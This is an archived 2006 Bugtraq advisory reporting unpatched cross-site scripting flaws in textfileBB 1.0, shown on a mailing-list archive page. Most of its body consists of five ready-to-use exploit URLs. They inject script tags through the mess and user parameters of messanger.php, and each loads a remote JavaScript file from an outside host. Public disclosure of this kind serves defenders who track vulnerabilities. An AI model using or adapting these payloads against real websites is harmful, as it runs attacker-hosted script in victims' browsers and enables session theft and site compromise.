lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060308033630.11740.qmail@securityfocus.com> Date: 8 Mar 2006 03:36:30 -0000 From: retard@...igs.com To: bugtraq@...urityfocus.com Subject: textfileBB <= 1.0 Multiple XSS ORIGIONAL: http://notlegal.ws/textfilebbmessanger.txt software: textfileBB vendors website: http://tfbb.jcink.com/ versions: <= 1.0 class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: medium exploit(s): http://example.com/messanger.php?mess=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E credit: author(s): retard email: retard@...igs.com